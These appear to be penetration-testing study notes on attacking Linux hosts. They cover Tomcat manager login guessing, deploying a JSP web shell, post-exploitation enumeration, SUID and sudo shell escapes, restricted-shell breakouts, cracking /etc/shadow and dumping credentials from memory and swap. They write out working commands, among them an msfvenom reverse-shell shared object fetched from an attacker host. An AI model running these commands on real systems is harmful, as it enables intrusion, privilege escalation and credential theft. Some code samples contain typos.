Metasploit includes an excellent utility for conducting password guessing attacks against Apache Tomcat servers, the "Tomcat Application Manager Login Utility". You can load it from the following location via the Mestasploit console:

msf > use auxiliary/scanner/http/tomcat_mgr_login

For this Manager Login Module, we can (most of the times), stay with the defaults and successfully crack the login assuming it's being left with its default credentials, which is quite frequently. Once we set our RHOSTS , RPORT and STOP_ON_SUCCESS options to true we can then run the scanner module. Metasploit will use its built-in dictionaries to check for default credentials.

Once we have some valid credentials for the Tomcat Manager, we can explore our options in regards to exploiting this access, and to ultimately, control of the system.

Note

Experiment with the Tomcat Manager Login utility in regard to using different username list, password dictionaries, etc. Don't hesitate to use those same techniques in the case that a target application or appliance isn't left configured with default credentials.

Once we have access to the Tomcat Manager area of the web server, we can see some already deployed applications. We also have a couple of different options available to us in regard to deploying our own Java application.

The quickest way to exploit this scenario is to use some tools that are already available to us. You can download Laudanum or find it on your Kali Linux in the /usr/share/laudanum directory. Within the jsp directory we can already see a pre-compiled cmd.war application that should be ready for use.

The cmd.war application is essentially a java application, which if we can deploy successfully, will allow control of the server and remote command execution. Uploading and deploying the war file to the application is straight-forward, and only requires we browse to the Laudanum cmd.war file and upload it. Once we click the 'Deploy' button confirm the application is available in the upper section of the Manager Interface.

If the application deployed correctly, we can browse to it with the following URL: http://<ip_address>:8180/cmd/cmd.jsp. This will allow us to execute commands on the system fro the JSP Shell. From here forward, there are multiple ways we can obtain a reverse shell from this system.

Post Exploitation

Post Exploitation Introduction - Study Guide

At this stage, you've conducted your initial enumeration, have been able to use the acquired information to obtain access to several machines, and now it's time to move into the post-exploitation phase:

  • Perform additional information gathering and enumeration of any systems from a local perspective (shell, console, etc.)

  • Elevate our privileges

  • Maintain a foothold

  • Pivot to other systems

  • Utilize methods to exfiltrate data

Our first task is to gather additional information about the system, including users, permissions, installed applications, how software is configured, and other things about the system which will help us in our quest for root.

There are many commands and things we can do once we've gotten access to a Linux machine. The process for post-exploitation can be broken down into several distinct categories, which can be further broken down into sub-categories:

  • Additional Information Gathering

  • Privilege Escalation

  • Lateral Movement

  • Data Exfiltration

  • Managing Access

Privilege Escalation - Study Guide

In regards to gathering information related to Privilege Escalation, once access to a host has been obtained there are several sub-categories we can use to distinguish the different types of information we will gather. This information is generally divided as in:

  • System and Network Information

    • Hostname

      • Does the hostname reveal anything about the systems' function? Can we leverage that information to gain access to function-related information?

      • Related Command: hostname

    • Kernel Version

      • Is the kernel vulnerable to any exploits?

      • Related Command: uname -a

    • Operating System

      • Does our current OS have any known exploitable vulnerabilities?

      • Related Command: cat /etc/issue

    • IP address

      • ifconfig

    • Running processes

      • ps auxw

    • Network Routes

      • Is our currently compromised machine routed to other networks? Can we use this information to pivot?

      • Related Command: route -n

    • DNS Server

      • Can we obtain information from the DNS Server? Active Directory Accounts, Zone Transfers, etc.

      • Related Command: cat /etc/resolv.conf

    • ARP Cache

      • Have other machines communicates with another target? Are the other machines accessible from the target?

      • Related Command: arp -a

    • Current Network Connections

      • Are there any established connections from our machine to other machines and vice-versa? Are the connections over encrypted or non-encrypted channels? Can we sniff the traffic of those connections?

      • Related Command: netstat -auntp

  • User Information

    • Current user permissions

      • Can our current user access sensitive information/configuration details that belong to other users?

      • Related Command: find / -user username

    • UID and GID information for all users

      • How many users on the system? What groups do users belong to?

      • Can we modify files belonging to users in other groups?

      • Related Command: for user in $(cat /etc/passwd | cut -f1 -d":"); do id $user; done

    • Last Logged on users

      • Who's been on the system? From what systems?

      • Can we pivot to those other systems using credentials we might already have?

      • Related Command: last -a

    • Root Accounts

      • How many UID 0 (root) accounts are on the system?

      • Can we log in as those accounts?

      • Related Command: cat /etc/passwd

    • Home Directories

      • Do we have access to other users' home directories?

      • Is any of the information contained in those directories useful to us?

      • Related Command: ls -als /home/*

  • Privileged Access / Cleartext Credentials

    • Can the current user execute anything with elevated privileges?

      • Related Command: sudo -l

    • Are there any setuid root (SUID) binaries on the system which may be vulnerable to privilege escalation?

      • Related Command: find / -perm -4000 -type f2>/dev/null

    • Can we read configuration files that might contain sensitive information, passwords, etc?

      • Related Command: grep "password" /etc/*.conf 2> /dev/null

    • Can we read the shadow file? If so, can we crack any of the hashes?

      • Related Command: cat /etc/shadow

    • Can we list or read the contents of the /root directory?

      • Related Command: ls -als /root

    • Can we read other users' history files?

      • Related Command: find /* -name *.*history* -print 2>/dev/null

    • Can we write to directories that are configured to serve web pages?

      • Related Command: touch /var/www/file

  • Services

    • Which services are configured on the system and what ports are they opening?

      • Related Command: netstat -auntp

    • Are service configuration files readable or modifiable by our current user?

      • Related Command: find /etc/init.d/ ! -uid 0 -type f 2>/dev/null | xargs ls -la

    • Can we modify the configuration of a a service in such a way that gives us elevated privileges?

      • Related Command: Edit Service Configuration File

    • Do the configuration files contain any information we can use to our advantage? (i.e., credentials, etc.).

      • Related Command: cat /etc/mysql/my.cnf

    • Can we stop or start the service as our current user?

      • Related Command: service service_name start/stop

    • What actions take place as a result of being able to stop and start services? (no related command)

  • Jobs/Tasks

    • What tasks or jobs is the system configured to run and at which times?

      • Related Command: cat /etc/crontab

      • Related Command #2: ls -als /etc/cron.*

    • Are there any custom jobs or tasks configured as root that world-writable?

      • Related Command: find /etc/cron* -type f -perm -o+x -exec ls -l {} \;

    • Can we modify any of the existing tasks at all?

      • Related Action: try and modify cron jobs

  • Installed Software Version Information

    • What software packages are installed on the system?

      • Related Command: dpkg -l

    • What versions? Are the installed out-of-date and vulnerable to existing available exploits?

      • Related Command: dpkg -l

      • Related Command: searchsploit "httpd 2.2"

    • Does any of the installed software allow us to modify their configuration files and could this result in gaining privileged access to the system?

      • Related Action: Try and modify package configurations

Much of this information can be gathered either manually or through the use of automated tools, which is a bit more time efficient when on an engagement.

One particular tool of note is LinEnum .

Cleartext Credentials in Configuration Files

LinEnum

LinEnum will automate much of the information gathering and enumeration phase for us, and there are also a great number of resources available to use as a reference for commands regarding the information gathering and enumeration process as it relates to post-exploitation.

In order to use LinEnum once on a system, we'll need to download it onto the target (via wget or nc).

While using nc, beware all traffic is unencrypted and maybe detected by IDS or other anomalous traffic detection mechanism implemented within an organization.

Once downloaded: chmod +x LinEnum.sh .

  • -h : help.

  • -k : search configuration files for a string, such as "password", this can often reveal credentials for other services which we can use for further exploitation.

Alternatively, we can get similar results manually by using the grep command like so:

grep -r password /etc/*.conf 2> /dev/null

Other methods:

# find dotfiles files with "history" in their names
find /* -name *.*history* -print 2 > /dev/null

# Grep the apache access.log file for "user" and "pass" strings
cat /var/log/apache/access.log | grep -E "^user|^pass"

# Dump cleartext Pre-Shared Wireless Keys from Network Manager
cat /etc/NetworkManager/system-connections/* | grep -E "^id|^psk"

Another Metasploit post module for Linux you'll find useful is the enum_system module, which will gather Linux version, User Accounts, Installed Packages, Cron jobs and more from an existing Metasploit shell session.

There are also several other Metasploit post modules we can use for post-exploitation of a Linux system. Experiment with these modules to see how they can help you further exploit a Linux machine.

msf > use post/linux/*

SUID Binaries

SUID or "setuid" executables are a blessing in disguise when it comes to privilege escalation opportunities. Executable files with the "setuid" attribute assigned, when executed, are run as the owner (EUID, or Effective User ID) of the file regardless of the current users' privileges.

$ ls -las /bin/ping
60 -rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping
# s attr: setuid attribute se for root-owned binary

The reason why ping is configured as a SUID root binary, is its very nature uses "raw sockets" to generate and receive ICMP packets and that activity requires root access.

The passwd executable, responsible for enabling users to change their passwords, is also SUID root, due to the fact that it needs to write to the /etc/passwd and /etc/shadow files.

Let's take a look to the following C code of a file as an example:

modcat.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char ** argv) {
    // Takes a file or other object as an argument to our program
    if (argc<2) {
        print("Reads a file. No file name provided.\n");
    } else {
        // Executes /bin/cat on our file
        execv("bin/cat", argv);
        perror("exec");
    }
}

After the code is compiled, a typical command line for our "modcat" would be: modcat /etc/passwd which would simply print the contents of that file. But now consider that an administrator has given that same executable the SUID attribute and is owned by root. In that case, we would be able to execute modcat to display the contents of /etc/shadow since the binary will run as root due to the setuid bit being set, and it being owned by root.

This modcat example can be trivially exploited to obtain root access to a system.

nmap is another example of a setuid binary sometimes found on Linux systems. Older versions of nmap contained an interactive shell which could be launched via the --interactive switch. Once the interactive mode and assuming the nmap executable was SUID root, simply running !sh in the interactive nmap console would land the user to a root shell.

glib '$ORIGIN' expansion privilege escalation is an interesting example related to SUID executables discovered by Tavis Ormandy of Google's Project Zero, exploits the GNU C Library Dynamic Linker glibc versions before 2.11.3 and 2.12.x versions up to 2.12.1 and takes advantage of glibc's failure to restrict the use of the LD_AUDIT environment variable when loading SUID executables with controls the $ORIGIN library search path, ultimately resulting in the execution of an arbitrary shared object (.so file).

Although this vulnerability was initially disclosed in 2010, a Linux exploit module was added to Metasploit January of 2018 and also provides a good example of other ways that privilege escalation can be obtained through the exploitation of environment variables, related to SUID executables.

There's a Metasploit module:

msf > use exploit/linux/local/glibc_origin_expansion_priv_esc

Sudo Privileged Access

sudo misconfigurations are another important finding as it relates to privilege escalation. sudo is used to provide privileged access to users on a temporary basis, allowing users to run commands as another user (usually root), and when tat elevated access is requires, a user can simply run sudo command.

An user in order to be able to utilize sudo a change is required in the /etc/sudoers configuration file. We can retrieve our sudoers status once we´re on system:

sudo -l

A standard user will typically not be able to view the /etc/sudoers file directly.

NOPASSWD directive indicates that the user won't require to enter a password.

Shell Escape via less:

  • If we take a look to its man entry, we can see that as part of its functionality, it allows a user to execute shell commands (shell escape) with the ! command.

  • This allows a user to execute shell commands from inside less.

  • If our user is in the /etc/sudoers file and can execute less on certain files (as root), in this case, any file in /var/log*;less will effectively executed as root.

  • We can also execute the !sh command to escape to a shell, followed by the id command to check our UID/GID information.

There are more examples of binaries on Linux that allow the user to execute shell commands. vi/vim editors also allows breaking out into a shell via the !sh method or executing any shell commands for that matter.

A list of some common executables, if they are present in the sudoers file, can give us root shells through different means. the below commands (!sh) are sometimes referred to as "shell escapes" and are executed from within the executables themselves:

  • less (via !sh)

  • more(via !sh)

  • vi/vim(via !sh)

  • nmap(--interactive + !sh)

  • ftp (!sh)

  • gdb (!sh)

  • python

  • perl

  • irb

  • lua

Aside from programs that allow shell commands to be executed with the ! feature, many others also exist, that with some experimentation and exploration, also allow the execution of arbitrary shell scripts or commands when passed as arguments via the command line.

man arbitrary command execution via Pager argument:

  • for instance, the man program, short for manual is essentially the command reference guide built into the Linux OS.

  • We use man to view "man pages" when we need to reference a particular program. If we want the man page for the id program we simply call man id.

  • The man program usually utilizes the more or less programs to display its pages depending on its configuration.

  • The program it uses for this purpose is known as the "pager", and can be specified with the -P switch when running man. If we look at the man page for man we can see what the pager option is about: man man.

  • Due to a quirk in the man program and how it handles the pager argument -P we can run a command that we want: man -P "id" man

  • Now considering we are allowd to execute man via sudo , we can execute whatever we want as root through man: sudo man -P "cat /etc/shadow" man.

docker sudo privilege escalation:

  • Although privilege escalation vectors related to sudo have existed since the inception of the Linux OS, one of the more recent examples of Sudo exploit requires that docker is installed on the target system and is also defined as an entry for a user in the /etc/sudoers file to be executed as root similar to how we've seen in the previous sudoers entries.

  • This particular vulnerability exploits docker by compiling shellcode for a root shell within a container, sets the SUID attribute on the resulting exploit binary and launches a root shell.

Restricted Shells:

  • Restricted shells are another topic we should become familiar with, as they are encountered in the field often in hardened environments where users require access to servers, but the administrators would like to limit the commands that users on the system can execute.

  • You may be more familiar with the term chroot jail when it comes to restricted shells.

  • A chrooted jail is a way to isolate users and users' processes from the rest of the OS.

  • All programs defined for a chroot jail are run in their own directory structure, with their own shared libraries and environment settings.

  • One of the more common implementations of restricted shells utilizes the rbash shell, which would be the shell defined for a user once logged on to a machine through pre-defined environment variables.

  • rbash when combined with a chroot jail, can be rather effective; however, many times administrators rely on rbash alone, which opens up several ways we can break out of the restricted shell.

  • When rbash shell is defined for users, some of the commands that are usually restricted are:

    • The ability to change into other directories (cd)

    • Specifying absolute path names or files containing (/) or (-)

    • Setting or unsetting the PATH environment variable

    • Using ENV or BASH_ENV for setting or unsetting other environment variables

    • Using bash output redirection operators (>, >>, >|, <>, >&, &>)

    • Disabling restricted mode using the set +r or set +o restricted commands

  • You can usually tell you're in a restricted shell when you start seeing "restircted" errors when you attempt to execute usual commands like cd or when trying to redirect the output of a command to a file.

  • One of the first things we can do to confirm we're in a restricted shell is to run the ENV command to get a better understanding of how your environment is configured and what your current shell is. Specifically, your $PATH and $SHELL environment variables.

  • Combined with the restricted errors we're seeing and an inability to run some typical shell commands, we can be sure we're in a restricted shell.

  • There are a great number of things we can try to break out this restricted shell:

    • As previously mentioned less, vim or nmap (among others) offer the ability to escape into a shell with the ! method. Those can certainly be used to attempt to get out of our restricted shell, assuming of course that your restricted shell allows you to run those binaries in the first place.

    • Restricted shell escape with VI/VIM:

      • Open a file and then run :!sh and hit <enter>.

      • This results in getting us a regular /bin/sh shell outisde of our restricted rbash shell.

    • Restricted shell escape with find:

      • Another trick we can use to break out of a restricted shell is with the find command coupled with the -exec argument: find /home/bob -name test -exec /bin/sh \;

      • This command is looking for a file named "test" in the /home/bob directory and if found, will execute whatever follows the -exec switch.

    • Restricted shell escape with python or perl:

      • It might be very likely that you will be able to execute python, perl irb while in a restricted shell, but if you find you can:

        • python -c 'import pty; pty.spawn("/bin/sh")

        • perl -e 'exec "/bin/sh";'

    • Restricted shell escape from another system with SSH:

      • If we have SSH credentials to a system for a user that is configured with a restricted shell, we can try and break out the shell remotely from another system by trying to execute a shell with SSH before the restricted shell is initialized on the target:

        • ssh restricted_user@targetserver -t "/bin/sh"

Cracking the Shadow

Imagine you've exploited a machine, have a Metasploit session or a reverse shell on the system as root, through a web-based or other exploit, but don't have any valid credentials to try and move laterally to other systems re-using credentials from a user that exists on your current exploited machine.

Sometimes a shell isn't enough, and we require credentials to further our objectives, move laterally from one machine to another, masquerade through a network using valid credentials, etc.

In the event we have a shell on a machine as root, there are several things we can do obtain some valid credentials. One of those involves cracking the password hashes in the /etc/shadow file.

The /etc/passwd and /etc/shadow files are responsible for maintaining the database of users on a Linux system are directly manipulated by the /usr/bin/passwd program among other programs whenever changes are made to any existing users or passwords.

Some Unix passwd History:

  • Before the mid-80's, both usernames and passwords were stored in a single file (/etc/passwd).

  • In an effort to better secure the file from dictionary and brute force attacks against the hashes by any user, developers introduced "Shadowing" of passwords via a separate file.

  • The /etc/shadow file we know today is only readable by root and the SUID root /etc/passwd program.

The /etc/passwd files stores general users information including current home directory, UID value, GID value, login shell and any descriptive information for a particular user and can be read by any standard user.

Whereas the /etc/shadow file stores the users' passwords in a hashed format, in addition to other things such as password expiration information, whether the user is required to change their password on next logon, min/max time between password changes and several other parameters.

The password hash is always the second field after the username. The fields are separated by a colon :.

The /etc/shadow file can only be read by root, the passwd program along with several other programs that require the ability to modify the /etc/passwd and /etc/shadow files.

In current versions of Linux, the hashes in the shadow files are stored in SHA-512 and can be quickly recognized by the $6$ at the beginning of the hash.

Older versions may be using SHA-256 or MD5 which can be identified by $5$ and $1$ respectively.

Once we've gotten a shell and are either able to execute commands as root, or we are root for that matter, we can execute a dictionary attack against the hashes in the /etc/shadow file.

Consideration must be taken in regards to whether or not the hasehs are using SHA-512, SHA-256 or MD5:

  • MD5 ($1$) hashes will be easiest to crack.

  • Depending on the complexity of the password, SHA-256 ($5$) and SHA-512 ($6$) may be a bit more difficult.

  • In all cases, if the password is weak, we can likely crack it regardless of the hashing algorithm.

Another point to note is that we'll want to crack the hashes offline once both the /etc/passwd and /etc/shadow files are copied to our attacker system. There are several reasons for this:

  • We make less noise on the target system.

  • Our target likely doesn't have the tools we need to crack the hashes.

  • Perhaps we require a machine with more processor power to launch our dictionary attack.

Once we've gotten copies of those two files, we can use a tool known as "unshadow" along with the "John the Ripper" password cracking tool to crack the hashes. Unshadow is distributed with John the Ripper.

unshadow passwd shadow > shadow.john
john shadow.john --wordlist=<wordlist>

MimiPenguin

If cracking the root or other users' password is out of the realm of possibility due to hash strength or password complexity, we cant try and obtain the root password directly from the machine's memory using MimiPenguin.

It works similarly to the well-known mimikatz for Windows but is designed for Linux and attempts to dump cleartext credentials from memory from the following applications:

  • GDP password (Kali Desktop, Debian Desktop)

  • Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop)

  • VSFTPd (Active FTP Connections)

  • Apache2 (Active HTTP Basic Auth Sessions)

  • OpenSSH (Active SSH Sessions - Sudo Usage)

There are two different scripts available, a shell script and a python script. Both have their pros and cons, some features are supported in the python script, others not in the shellscript. It's recommended trying both when assessing the target.

Pilfering Credentials From Swap Memory

Staying along the lines of directly dumpling credentials from memory, we can also dump sensitive information from the swap file. As everything is a "file" in Linux, so is swap space, and we can use that to our advantage using built-in tools.

One caveat to this technique is that this has to be done as the root account and may also be prone to false-positives as it's difficult to ascertain exactly where in swap memory sensitive information will be temporarily stored. The partition or "file" defined as the swap file can be found with the following commands:

swapon -s

We can obtain the exact same information by issuing:

cat /proc/swaps

The process from here is straight. We can use strings command against the /dev/sdaX partition while we use grep for strings we're looking for:

strings /dev/sda5 | grep "password="
strings /dev/sda5 | grep "&password="

This shellscript has also been written to automate searching for common sensitive strings within the swap file:

Code Execution via Shared Object Library Loading

Hijacking Dynamically Linked Shard Object Libraries (.so files) is another method we can use to obtain elevated privileges to a Linux system under certain conditions.

Similar to Microsoft Windows' Dynamic-Link library (DLL), Shared Objects libraries are essentially their equivalent on Linux systems, providing applications with functions that are called from outside of an application by referencing .so files at an application's runtime.

There are two primary types of shared object libraries we'll encounter in our Linux travels, and they are:

  • Static Libraries (.a): code that is compiled into an application.

  • Dynamically Linked Shared Object Libraries (.so): these can either be linked to the application at runtime or loaded or unloaded and linked during an application execution.

More info: http://www.yolinux.com/TUTORIALS/LibraryArchives-StaticAndDynamic.html

When a Linux application is executed, one of the first things that happens under-the-hood, it it uses Shared Objects, is that it will search for those Shared Objects in the following search order:

  1. Any directories specified by -rpath-link options (RPATH)

  2. Any directories specified by -rpath options (RPATH)

  3. If the rpath and -rpath-link options are not used, it will then search the contents of the environment variables LD_RUN_PATH and LD_LIBRARY_PATH

  4. Directories defined in the DT_RUNPATH environment variable first, if that doesn't exist, then the DT_RPATH .

  5. Then, the default lib directories, normally /lib and /usr/lib.

  6. Finally, any directories defined in the /etc/ld.so.conf file.

Before we go into further details, there are some things we need to determine before we continue:

  1. Determine the shared objects that are being loaded by an executable.

  2. Determine if the application was compiled with RPATH or RUNPATH options. If yes, can we write into the locations specified by the either of those options?

Determine the shared object libraries that are being loaded by an executable

We do this with the ldd command. If we want to see the shared objects being loaded by the /usr/local/bin/program executable, we run:

ldd /usr/local/bin/program

From its output we can determine if we can hijack any of the Shared Objects the executable is linking once we've determined if the executable was compiled with RPATH or RUNPATH options.

If we find that the executable was in fact compiled with RPATH or RUNPATH options, we will be able to drop our payload in the directories defined by either of those options.

Determine if the executable was compiled with RPATH options

For determining whether an executable was compiled with RPATH or RUNPATH options, we can use the objdump command.

objdump -x /usr/local/bin/program | grep RPATH
objdump -x /usr/local/bin/program | grep RUNPATH

If the executable in question was compiled with the RPATH or RUNPATH options, the objdump output will be similar to the below:

RPATH /tmp/program/libs
RUNPATH /tmp/program/libs

Imagine that we have determined that the program executable was indeed compiled with RPATH options pointing to /tmp/program/libs, and we also know that RPATH is checked for linked Shared Objects before the /lib or /usr/lib directories, we can place our "malicious" .so file in the /tmp/program/libs directory, and it should be executed whenever the executable is launched. Let's look to our ldd output of the program executable:

libpam_misc.so.- => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x0000007fbadf120000)
program.so => /usr/lib/program/program.so (0x0000007fb12f120000)
libaudit.so1. => /lib/x86_64-linux-gnu/libaudit.so.1 (0x0000007fb121121200)
libc.so6 => /lib/x86_64-linux-gnu/libc.so.6 (0x0000007fb12f1212300)

Since we've determined that program will load shared objects from the /tmp/program/libs directory defined with the RPATH option (as we saw with objdump) and it will load them before it loads anything in /lib or /usr/lib. Technically, we could pick any of the above and create a shared object with a similar name of any of them. However, we'll go with the program.so object for the name of our malicious shared object file.

Generate Backdoored Shared Object

We can create our backdoored program.so shared object with msfvenom:

msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker LPORT> -f elf-so -o program.so
python -m SimpleHTTPServer 80

We are creating a .so which is the name of one of the shared objects we know as program loads at runtime and using a stage less shell reverse tcp payload pointing to our attacker machine and port, where we'll also setup a listener with the same payload.

On target system:

cd /tmp/program/libs && wget http://attacker_ip/program.so

Start a listener on the attacker machine and execute program:

msf > use exploit/multi/handler
msf exploit (multi/handler) > set payload linux/x64/shell_reverse_tcp
msf exploit (multi/handler) > set LHOST <attacker_ip>
msf exploit (multi/handler) > set LPORT <attacker_port>
msf exploit (multi/handler) > exploit -j

Important

An important point to note is that in order for us to elevate our privileges with this vulnerability, it is required that the shred object via executing the program, be executed by a user with higher privileges, or scheduled as part of a cron job that runs as root, etc.

We have several options:

  • We either wait for the program to be launched by a user with elevated privileges, at which point a reverse shell would be initiated back to our attacker machine under the context of that users' privileges (hopefully root).

  • Or, in an ideal scenario, the "interesting" program we found would already be configured as a service, or to be run from a cron as root. At which point, we simply wait for the corn job to run.

  • We could also use social engineering to try and persuade an end-user to execute to program.

  • This reinforces the importance of comprehensive information gathering and enumeration in regards to the search for root-owned services and root-owned cron jobs that a low privileged user could modify.

  • Alternatively, if we are already root on the system, if we are already root on the system, we can use this method as a stealthy persistence mechanism.

Introduction to Kernel Exploits

Kernel Exploits are one of the most prolific method for elevating privileges on Linux machines with outdated kernels. New vulnerabilities are discovered and exploits are developed on practically a month-basis for varying distributions and architectures.

Some recent examples of privilege escalation vulnerabilities are associated exploits affecting the Linux kernel include:

The kernel is the core of the Linux operating system. It was initially conceived and created by Linus Torvalds in 1991 and has since grown to support dozens of computing architectures including routers, servers, workstations, firewalls and even mobile devices such as Android. Even game systems such as the PlayStation is based of FreeBSD. Being open source with thousands of contributors and users worldwide, it makes the kernel a high-value for Zero-Days or otherwise more popular and known attack vectors.

There are many different categories of kernel exploits, some of the most common are:

  • Buffer Overflows

  • Memory Corruption

  • Denial-Of-Service

  • Race Conditions

When not in "DoS" category, they most of the time allow arbitrary code execution and privilege escalation.

Linux kernel exploits for our purposes will typically either be pre-compiled ELF binaries, C source code (.c files) which we'll compile ourselves or available via exploit frameworks such as Metasploit.

A word of caution about exploit code

As with any other file, you would download from the internet from an unknown source, just blindly compiling or executing exploits of which we don't understand their inner workings could result in your system being compromised and could also result in any systems you're testing to be compromised by unknown actors as well.

Always take precaution when compiling and executing exploit code. Go the extra mile and try to understand what the exploit is actually doing behind-the-scenes.

This is particularly true of shellcode in exploits as the shellcode could be doing something malicious, whether it's opening up a bind shell on your system, initiating a reverse shell to an attacker's system or something, deleting your entire operating system (rm -rf *).

For the most part, exploits originating from most frameworks, (as Metasploit) are generally OK since many eyes review them, but take some extra caution with other exploit sources.

Find the right kernel exploit

There are several tools available to us that we can use for searching for exploits. One of these tools is searchsploit and is pre-installed on Kali Linux. With searchsploit we simply run the command followed by a search term:

searchsploit "linux kernel debian"

Another tool written in Perl:

Run this linux exploit suggester locally on your attacker system whiles specifiying the kernel version of your tarket with the -k switch.

If we run it without supplying the -k option, it simply executes a uname -a command and will determine the appropriate kernel version on the target system.

Once we´ve identified several kernel exploits that are valid for our targets' kernel version, we can move onto downloading the source code to the target. Keep in mind that not all exploits will be "click-and-shoot". Many require parameters that we'll need to supply to the exploit command line in order to get them working.

An example of this is the UDEV < 1.4.1 - Local Privilege Escalation exploit which affects the 2.6 kernel and requires that we determine the PID of the udevd netlink socket and also requires that we create a file /tmp/run which contains whatever code we'd like to be executed as root.

Compiling Exploit Code

gcc --version
gcc exploit.c -o exploit
chmod +x exploit
./exploit

Sometimes, more complex compile options are required for our exploit. In that case, ofthen times the exploit code itself will include within its commented section, the command line we can use to compile it. It will also include usage details about the exploit.

Some other times, we will find ourselves in a situation where our target is of a 32 bits architecture and doesn't have gcc installed, and we need to compile the exploit on our 64bit attacker machine. Use the m32 flag to achieve so:

gcc -m32 exploit.c -o exploiddd

Lateral Movement - Study Guide

Lateral Movement involves moving throughout the target organization from machine to machine, server to server using credentials we obtained through other phases, and further strengthening our foothold within the target infrastructure to the ultimate objective which is defined by the customer.

Data Exfiltration - Study Guide

Maintaining Access - Study Guide

Last updated